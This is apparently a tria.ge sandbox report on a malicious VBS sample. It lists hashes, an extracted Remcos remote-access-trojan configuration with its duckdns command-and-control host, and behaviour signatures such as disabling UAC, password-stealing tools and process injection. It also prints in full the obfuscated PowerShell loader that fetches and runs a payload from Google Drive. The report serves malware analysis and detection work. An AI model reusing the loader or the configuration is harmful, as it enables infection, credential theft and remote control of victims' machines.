Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27/11/2024, 14:30
Static task
static1
Behavioral task
behavioral1
Sample
z34SOLICITUDDEP.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
z34SOLICITUDDEP.vbs
Resource
win10v2004-20241007-en
General
-
Target
z34SOLICITUDDEP.vbs
-
Size
33KB
-
MD5
f6a1927833d8bdbed39158eeb8fec038
-
SHA1
d166a956aee76d8c1a17b97905a2a554d71cd796
-
SHA256
674affabc23dacf7e1dd9f1c663589f1c1f3a8383037f2cb1a547d48beaf34b9
-
SHA512
6507a607f9964a923a40fdc329b3a1c5b9a36f5afb72129808a6a1121afa1c686c195a7cb8d3781e634d997ffded8b90a5a933bc9f3b06250be127373823b240
-
SSDEEP
768:hFiasUNgXGy5FMJerHSLNj0Z6AkhZw7XJuBbVVjgHraV:jiasj5zH+GZ6v/w78XNgHuV
Malware Config
Extracted
remcos
RemoteHost
234d34gb6.duckdns.org:3613
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-CPWWCP
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4568-109-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2804-112-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4220-106-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4568-109-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4220-106-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 13 IoCs
flow pid Process 3 4104 WScript.exe 7 3776 powershell.exe 11 3776 powershell.exe 23 684 msiexec.exe 25 684 msiexec.exe 27 684 msiexec.exe 29 684 msiexec.exe 31 684 msiexec.exe 33 684 msiexec.exe 34 684 msiexec.exe 35 684 msiexec.exe 36 684 msiexec.exe 38 684 msiexec.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3244 Chrome.exe 3112 msedge.exe 4220 msedge.exe 2228 msedge.exe 1844 Chrome.exe 2312 Chrome.exe 3472 Chrome.exe 4988 msedge.exe 2696 msedge.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
pid Process 3776 powershell.exe 4508 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 23 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 684 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4508 powershell.exe 684 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 684 set thread context of 4220 684 msiexec.exe 102 PID 684 set thread context of 4568 684 msiexec.exe 103 PID 684 set thread context of 2804 684 msiexec.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4344 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3776 powershell.exe 3776 powershell.exe 4508 powershell.exe 4508 powershell.exe 4508 powershell.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 4220 msiexec.exe 4220 msiexec.exe 684 msiexec.exe 684 msiexec.exe 2804 msiexec.exe 2804 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 1844 Chrome.exe 1844 Chrome.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 4220 msiexec.exe 4220 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4508 powershell.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3112 msedge.exe 3112 msedge.exe 3112 msedge.exe 3112 msedge.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 2804 msiexec.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe Token: SeShutdownPrivilege 1844 Chrome.exe Token: SeCreatePagefilePrivilege 1844 Chrome.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1844 Chrome.exe 3112 msedge.exe 3112 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 684 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4104 wrote to memory of 3776 4104 WScript.exe 82 PID 4104 wrote to memory of 3776 4104 WScript.exe 82 PID 4508 wrote to memory of 684 4508 powershell.exe 93 PID 4508 wrote to memory of 684 4508 powershell.exe 93 PID 4508 wrote to memory of 684 4508 powershell.exe 93 PID 4508 wrote to memory of 684 4508 powershell.exe 93 PID 684 wrote to memory of 1908 684 msiexec.exe 94 PID 684 wrote to memory of 1908 684 msiexec.exe 94 PID 684 wrote to memory of 1908 684 msiexec.exe 94 PID 1908 wrote to memory of 4344 1908 cmd.exe 96 PID 1908 wrote to memory of 4344 1908 cmd.exe 96 PID 1908 wrote to memory of 4344 1908 cmd.exe 96 PID 684 wrote to memory of 1844 684 msiexec.exe 97 PID 684 wrote to memory of 1844 684 msiexec.exe 97 PID 1844 wrote to memory of 4944 1844 Chrome.exe 98 PID 1844 wrote to memory of 4944 1844 Chrome.exe 98 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 2952 1844 Chrome.exe 99 PID 1844 wrote to memory of 1180 1844 Chrome.exe 100 PID 1844 wrote to memory of 1180 1844 Chrome.exe 100 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101 PID 1844 wrote to memory of 4704 1844 Chrome.exe 101
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\z34SOLICITUDDEP.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Efteruddannelseskurser='Aabenbaringen';;$Overordentligt233='Lumbayao';;$Sacket='Eggcupful';;$Procrypsis197='Betle';;$Stvknappernemponderableness='Baandtlleren';;$Dbendes=$host.Name;function Tehandelens($lugger){If ($Dbendes) {$sorbeten=4} for ($Stvknapperne=$sorbeten;;$Stvknapperne+=5){if(!$lugger[$Stvknapperne]) { break }$Rinjin+=$lugger[$Stvknapperne]}$Rinjin}function Bacillite($fitchburg){ .($Willard) ($fitchburg)}$Steamfitter=Tehandelens 'NonfNmanuEKosmTlu,e.Br sW XeneShoeB Perc GallLe tImo sE Refn pydT';$Sourdeline=Tehandelens 'UnyoMko.toTr.ez va iInd lL.nilParaaRogn/';$Biliteral=Tehandelens 'FldeTUnd l yhesDele1En.y2';$Peed='Spen[ManiN HusETillTClus.FljksFlise S,rRrekrvRi eiUndeC EncEGradpMaleoHuslIRequnSymoTR fiM reA T enSkamaKlargMiljEKontRUnsn]Macc:serv:kldeS ncEL ndCI dluApplrPlatiIne.tRecrYNebepTiborAcalOPackTCan OcenoCTe,sOKon l Kol=Tth $TorvBUnrei Gonl OptI GleTUnmoEFngsREpita B aL';$Sourdeline+=Tehandelens ' hae5 Sur.Heng0Skov Udle( Pe.W oksiN nen CaldTeleoEr.vwFuldsTrus OrdfNCin TJ,co Inse1Enke0 Bre.Ange0 Ng ;Zyg F,rsWUnexiFissnCosm6.ina4Bulb;Brov ffix ,rg6Bok.4 ort;Co,m Kul,rCompvBlac:Co,v1 for3Job,1Phot.Pr.a0B,lg)Tran Enk.Ggaa.eIndfcun,ikWienoAppl/,elg2Pena0Fusu1 ips0al.e0Samm1Prot0,nlb1Ch l Gat F SesiPleorMouge Vurf.oneoStalxPrem/Euhe1Feri3Eret1Util. Swi0';$Remarking141=Tehandelens ' PolUDoxis tjeEProsr ras-MornaSperGCinde CitNNeedt';$Syntaksanalyseredes=Tehandelens 'Besth egtBispt aggp ColsBehr:Advo/Ufor/PhosdMastrUndei BrovForleSixt.LrregBredo psio ilgls el BloeTr.c.overcCoa.oBag m Spk/Aftru TercAppo? mbleHavrx,ivepPitco Mo rVexet Bo =FrapdBolioStoew Ka nGlanl Dyno StjaTaardKlog&Antii Cald sca=Erot1BlebbCaskV Li 7 pomRubbEMastuBol y Co YpersTNaepHHy.eTmarl5Syll4UdskHSam,GSoluIRidsdpancINo,kdPecuE.upexGnatOPolyePelaBud.rzV rs_Forr8Narc1 anoxSletI BehE Enrd';$Paafuglefjerens=Tehandelens 'Nico>';$Willard=Tehandelens 'Pos ItranEcoucX';$Acidosteophyte='Chough140';$Chemitypy='\Suspensioners.Aut';Bacillite (Tehandelens 'bisp$ApplgGermlvakao PasBsexuAAerol Ple:AchitCherA AfhgDestaPneusreprs D lUMi.sIf rsDJydeaGastEVa r=Sh t$ReenE Id.N PilVLav :Za nAgra PBeskPUndiDRes A KreTRen arigs+ Eur$limpcIndmhMoraeQuanml,ngi.yrtTNondy TarpAfb Y');Bacillite (Tehandelens 'Bir $ ,atgRep L EmbO Re.b A baTidolCo,t:PensUU koNf,igTFor hBeskiInveeB ggvStrmI SanSsludhmi i=Tusn$ KkkScrusY DynnE,anTNavlaF,rhkNonaS GaaaStvvN quoaD,egL Ry,YTedesji,pE ongRPsi EMes dB gsERatisDivi.GastSHypopStrulJordILet,tFric(Ork $SphiPVirka,aliA Petf,latU Th gA.epLdannecommFskelJAm uEEmhtR ,kve sp n SkaSKon )');Bacillite (Tehandelens $Peed);$Syntaksanalyseredes=$Unthievish[0];$Kirsty4=(Tehandelens 'S.lv$PastGpostlAlopoBillBGu nAI epLCl,a: Re,PFilmIJengGBuhkESedjoTr snUnwiAMahobNon lraflEArte=KrftnAmmoeGespWH.rr-Ji,gOHin bTeksJMucoe noncFrgetUdru RefisFdelYmusiSCol,T,ddeEStreM Kv .turn$ Cyks PaltH.erEAwara rypMIl iF AariFr gt AveTBicueKlicR');Bacillite ($Kirsty4);Bacillite (Tehandelens 'Un,u$SeksPHy oi .org BageAymeoSnidn CraaSkribMalalAut,eArbe. ebeHTy.aeDaadaventdEfteeen lr.icasKred[Prag$objeR araeSe vm AnnaSvu,rUdekkParsiDr onFedtgembr1Dkke4 A.n1.eku]B am=Harz$IrriSRicholeviuNskerFusidUnsue NeplTumbi,okenSve e');$Tromlers224=Tehandelens 'Kryp$ BrnPWarri BekgBanae ForoHeglnBe eaAn,eb nralLease A.t.Kkk,D Grao ypsw Pr.nInfolRaadoRa.taNeutd SauFOrniiBismlUnree Ant(expe$Se tSLejey,onnn CohtDataa PrekOplesPrewa Omtn CenaU,pal AmoyMells.homeTriwr U.def eldHe rePerfsJegr,Auto$HamsP Vo n,ongtRoad)';$Pnt=$tagassuidae;Bacillite (Tehandelens 'Oste$Albug ClelRecoOCataBTheiA Gl lForf:Compn G iE undeNin,DPumpLSmoke DifD.ard= Dve( igtSpirEDampSIndtt N l- leP Stea iriTBenghF,kh Insi$Coehp iteNDicrTdrae)');while (!$Needled) {Bacillite (Tehandelens 'th,r$AntigKnytlTilloS.lpbUrovaPe ll g h:H,ssU uddS kksR leaP eil Karg Huls Has=Star$ Ar.E GlunParteLuftcunageElixlSvejl BareKa enSamfs') ;Bacillite $Tromlers224;Bacillite (Tehandelens 'mo.tsNo.nTSpr aCon,RPlactHead-CaulSMilil PaaEPersegi tpSkim Ret4');Bacillite (Tehandelens '.vrt$ iniGmarkLRealo UroB k ra Bo lRedo: BasnKernE onsePhacd En lForlexenoD Tei=C pe(ParaT AskeBlgesBa yTBerm- aduPA elaBry,TA oihOpda Grin$TrknPLageNLondTo no)') ;Bacillite (Tehandelens ' Ven$Facig SkrL ingO BrubBesta S al Pri:DillPKorrSSk lI Coil Un a B,nN Ko tbracHRuskrHypoOK ltpMoorITales erkmRe,m2bone4Fasa0I.fi=Nasu$Mo oGpe,sl rumOurosB VaaAEranLFoye: ForTtredz EleiSnegmFysiMKnogeVarmS Bry+Bold+Anno%Mi,b$EarruuretnUdbrtUnm,H entIDe.oEYng v ZetiA tiSFestHreca.flleCTormORepeU,lurNSaucT') ;$Syntaksanalyseredes=$Unthievish[$Psilanthropism240]}$Recaps=312553;$Slvklos=30447;Bacillite (Tehandelens 'Bilt$SandgLi.hL LovOsc.lB S.aAReimlSpec:F,ersPretUHandBSideD U le DevdMicruRoacCDobbiBrndBBrunlWheyEBrne Bran=Ov.r SaurGFeste SomTK,ar- emicCybeO Be,nTurnt.asseRoseNf,iptBiss Cap.$ WriPPa kNKan T');Bacillite (Tehandelens 'Anlg$fouegFyrrl UndoMegabA oma S plUnre:HandMHan.aPycnrSta iUn.co EpilGoklaCo r Tip=Zeun Be y[SlsfSPatoyViolsInditEmote M nm ete. ScrCJagto No.nBeauvTableAfknr ufft Fir]kata: Pos: PunFS mmrsklsoBr lmBekeBVib aMo gsmetreMejs6Cosc4PleuSObrotReber ClaiOvern Subg Bry( Par$rataSheteu Rinb C ed T aeGingdBrinuReincOve,i kimbFashlT oreey i)');Bacillite (Tehandelens 'Peri$ O tgO teLbefaorumkBKlodABio lRump:gypsH pekyRunkg FarrH.tuOS,atGCa uRKnapAluteMcent Cata=Innu Prae[MicrSMartyS ndsCompTPro EHalamBack.FaveTAftreTvanXstyrtadg,.RosseC ypn,tjfc ivio RocdUno.i DemnesopgBigu],oni:Jv h:TriuaFo esB,llcAms i CyciPou..DesigS ejECheeTInfisWilitLicerTec,i eckN UrogVirk(Cha $ atamzebrA rerConsITrykoInitlProfaFair)');Bacillite (Tehandelens 'Non $Yng,GAnorLKoo.OCl sbLysnA Co lca,s:Co iFper LNyheUBenaSUappkmateeMer rKomm=Al.o$ FemH onmyOphtGSondRUdspo opsgHortrU.huaInteMFlyv.,ears.abiUHa.nbBri,S Blet SenRMudsiMakrNRjseG Ind(Mikr$ nchR olkED micDiffABlaaPVirkSKulh,Thri$ OxiSInclLBlegvTranKA omL sano S as ko)');Bacillite $flusker;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Efteruddannelseskurser='Aabenbaringen';;$Overordentligt233='Lumbayao';;$Sacket='Eggcupful';;$Procrypsis197='Betle';;$Stvknappernemponderableness='Baandtlleren';;$Dbendes=$host.Name;function Tehandelens($lugger){If ($Dbendes) {$sorbeten=4} for ($Stvknapperne=$sorbeten;;$Stvknapperne+=5){if(!$lugger[$Stvknapperne]) { break }$Rinjin+=$lugger[$Stvknapperne]}$Rinjin}function Bacillite($fitchburg){ .($Willard) ($fitchburg)}$Steamfitter=Tehandelens 'NonfNmanuEKosmTlu,e.Br sW XeneShoeB Perc GallLe tImo sE Refn pydT';$Sourdeline=Tehandelens 'UnyoMko.toTr.ez va iInd lL.nilParaaRogn/';$Biliteral=Tehandelens 'FldeTUnd l yhesDele1En.y2';$Peed='Spen[ManiN HusETillTClus.FljksFlise S,rRrekrvRi eiUndeC EncEGradpMaleoHuslIRequnSymoTR fiM reA T enSkamaKlargMiljEKontRUnsn]Macc:serv:kldeS ncEL ndCI dluApplrPlatiIne.tRecrYNebepTiborAcalOPackTCan OcenoCTe,sOKon l Kol=Tth $TorvBUnrei Gonl OptI GleTUnmoEFngsREpita B aL';$Sourdeline+=Tehandelens ' hae5 Sur.Heng0Skov Udle( Pe.W oksiN nen CaldTeleoEr.vwFuldsTrus OrdfNCin TJ,co Inse1Enke0 Bre.Ange0 Ng ;Zyg F,rsWUnexiFissnCosm6.ina4Bulb;Brov ffix ,rg6Bok.4 ort;Co,m Kul,rCompvBlac:Co,v1 for3Job,1Phot.Pr.a0B,lg)Tran Enk.Ggaa.eIndfcun,ikWienoAppl/,elg2Pena0Fusu1 ips0al.e0Samm1Prot0,nlb1Ch l Gat F SesiPleorMouge Vurf.oneoStalxPrem/Euhe1Feri3Eret1Util. Swi0';$Remarking141=Tehandelens ' PolUDoxis tjeEProsr ras-MornaSperGCinde CitNNeedt';$Syntaksanalyseredes=Tehandelens 'Besth egtBispt aggp ColsBehr:Advo/Ufor/PhosdMastrUndei BrovForleSixt.LrregBredo psio ilgls el BloeTr.c.overcCoa.oBag m Spk/Aftru TercAppo? mbleHavrx,ivepPitco Mo rVexet Bo =FrapdBolioStoew Ka nGlanl Dyno StjaTaardKlog&Antii Cald sca=Erot1BlebbCaskV Li 7 pomRubbEMastuBol y Co YpersTNaepHHy.eTmarl5Syll4UdskHSam,GSoluIRidsdpancINo,kdPecuE.upexGnatOPolyePelaBud.rzV rs_Forr8Narc1 anoxSletI BehE Enrd';$Paafuglefjerens=Tehandelens 'Nico>';$Willard=Tehandelens 'Pos ItranEcoucX';$Acidosteophyte='Chough140';$Chemitypy='\Suspensioners.Aut';Bacillite (Tehandelens 'bisp$ApplgGermlvakao PasBsexuAAerol Ple:AchitCherA AfhgDestaPneusreprs D lUMi.sIf rsDJydeaGastEVa r=Sh t$ReenE Id.N PilVLav :Za nAgra PBeskPUndiDRes A KreTRen arigs+ Eur$limpcIndmhMoraeQuanml,ngi.yrtTNondy TarpAfb Y');Bacillite (Tehandelens 'Bir $ ,atgRep L EmbO Re.b A baTidolCo,t:PensUU koNf,igTFor hBeskiInveeB ggvStrmI SanSsludhmi i=Tusn$ KkkScrusY DynnE,anTNavlaF,rhkNonaS GaaaStvvN quoaD,egL Ry,YTedesji,pE ongRPsi EMes dB gsERatisDivi.GastSHypopStrulJordILet,tFric(Ork $SphiPVirka,aliA Petf,latU Th gA.epLdannecommFskelJAm uEEmhtR ,kve sp n SkaSKon )');Bacillite (Tehandelens $Peed);$Syntaksanalyseredes=$Unthievish[0];$Kirsty4=(Tehandelens 'S.lv$PastGpostlAlopoBillBGu nAI epLCl,a: Re,PFilmIJengGBuhkESedjoTr snUnwiAMahobNon lraflEArte=KrftnAmmoeGespWH.rr-Ji,gOHin bTeksJMucoe noncFrgetUdru RefisFdelYmusiSCol,T,ddeEStreM Kv .turn$ Cyks PaltH.erEAwara rypMIl iF AariFr gt AveTBicueKlicR');Bacillite ($Kirsty4);Bacillite (Tehandelens 'Un,u$SeksPHy oi .org BageAymeoSnidn CraaSkribMalalAut,eArbe. ebeHTy.aeDaadaventdEfteeen lr.icasKred[Prag$objeR araeSe vm AnnaSvu,rUdekkParsiDr onFedtgembr1Dkke4 A.n1.eku]B am=Harz$IrriSRicholeviuNskerFusidUnsue NeplTumbi,okenSve e');$Tromlers224=Tehandelens 'Kryp$ BrnPWarri BekgBanae ForoHeglnBe eaAn,eb nralLease A.t.Kkk,D Grao ypsw Pr.nInfolRaadoRa.taNeutd SauFOrniiBismlUnree Ant(expe$Se tSLejey,onnn CohtDataa PrekOplesPrewa Omtn CenaU,pal AmoyMells.homeTriwr U.def eldHe rePerfsJegr,Auto$HamsP Vo n,ongtRoad)';$Pnt=$tagassuidae;Bacillite (Tehandelens 'Oste$Albug ClelRecoOCataBTheiA Gl lForf:Compn G iE undeNin,DPumpLSmoke DifD.ard= Dve( igtSpirEDampSIndtt N l- leP Stea iriTBenghF,kh Insi$Coehp iteNDicrTdrae)');while (!$Needled) {Bacillite (Tehandelens 'th,r$AntigKnytlTilloS.lpbUrovaPe ll g h:H,ssU uddS kksR leaP eil Karg Huls Has=Star$ Ar.E GlunParteLuftcunageElixlSvejl BareKa enSamfs') ;Bacillite $Tromlers224;Bacillite (Tehandelens 'mo.tsNo.nTSpr aCon,RPlactHead-CaulSMilil PaaEPersegi tpSkim Ret4');Bacillite (Tehandelens '.vrt$ iniGmarkLRealo UroB k ra Bo lRedo: BasnKernE onsePhacd En lForlexenoD Tei=C pe(ParaT AskeBlgesBa yTBerm- aduPA elaBry,TA oihOpda Grin$TrknPLageNLondTo no)') ;Bacillite (Tehandelens ' Ven$Facig SkrL ingO BrubBesta S al Pri:DillPKorrSSk lI Coil Un a B,nN Ko tbracHRuskrHypoOK ltpMoorITales erkmRe,m2bone4Fasa0I.fi=Nasu$Mo oGpe,sl rumOurosB VaaAEranLFoye: ForTtredz EleiSnegmFysiMKnogeVarmS Bry+Bold+Anno%Mi,b$EarruuretnUdbrtUnm,H entIDe.oEYng v ZetiA tiSFestHreca.flleCTormORepeU,lurNSaucT') ;$Syntaksanalyseredes=$Unthievish[$Psilanthropism240]}$Recaps=312553;$Slvklos=30447;Bacillite (Tehandelens 'Bilt$SandgLi.hL LovOsc.lB S.aAReimlSpec:F,ersPretUHandBSideD U le DevdMicruRoacCDobbiBrndBBrunlWheyEBrne Bran=Ov.r SaurGFeste SomTK,ar- emicCybeO Be,nTurnt.asseRoseNf,iptBiss Cap.$ WriPPa kNKan T');Bacillite (Tehandelens 'Anlg$fouegFyrrl UndoMegabA oma S plUnre:HandMHan.aPycnrSta iUn.co EpilGoklaCo r Tip=Zeun Be y[SlsfSPatoyViolsInditEmote M nm ete. ScrCJagto No.nBeauvTableAfknr ufft Fir]kata: Pos: PunFS mmrsklsoBr lmBekeBVib aMo gsmetreMejs6Cosc4PleuSObrotReber ClaiOvern Subg Bry( Par$rataSheteu Rinb C ed T aeGingdBrinuReincOve,i kimbFashlT oreey i)');Bacillite (Tehandelens 'Peri$ O tgO teLbefaorumkBKlodABio lRump:gypsH pekyRunkg FarrH.tuOS,atGCa uRKnapAluteMcent Cata=Innu Prae[MicrSMartyS ndsCompTPro EHalamBack.FaveTAftreTvanXstyrtadg,.RosseC ypn,tjfc ivio RocdUno.i DemnesopgBigu],oni:Jv h:TriuaFo esB,llcAms i CyciPou..DesigS ejECheeTInfisWilitLicerTec,i eckN UrogVirk(Cha $ atamzebrA rerConsITrykoInitlProfaFair)');Bacillite (Tehandelens 'Non $Yng,GAnorLKoo.OCl sbLysnA Co lca,s:Co iFper LNyheUBenaSUappkmateeMer rKomm=Al.o$ FemH onmyOphtGSondRUdspo opsgHortrU.huaInteMFlyv.,ears.abiUHa.nbBri,S Blet SenRMudsiMakrNRjseG Ind(Mikr$ nchR olkED micDiffABlaaPVirkSKulh,Thri$ OxiSInclLBlegvTranKA omL sano S as ko)');Bacillite $flusker;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
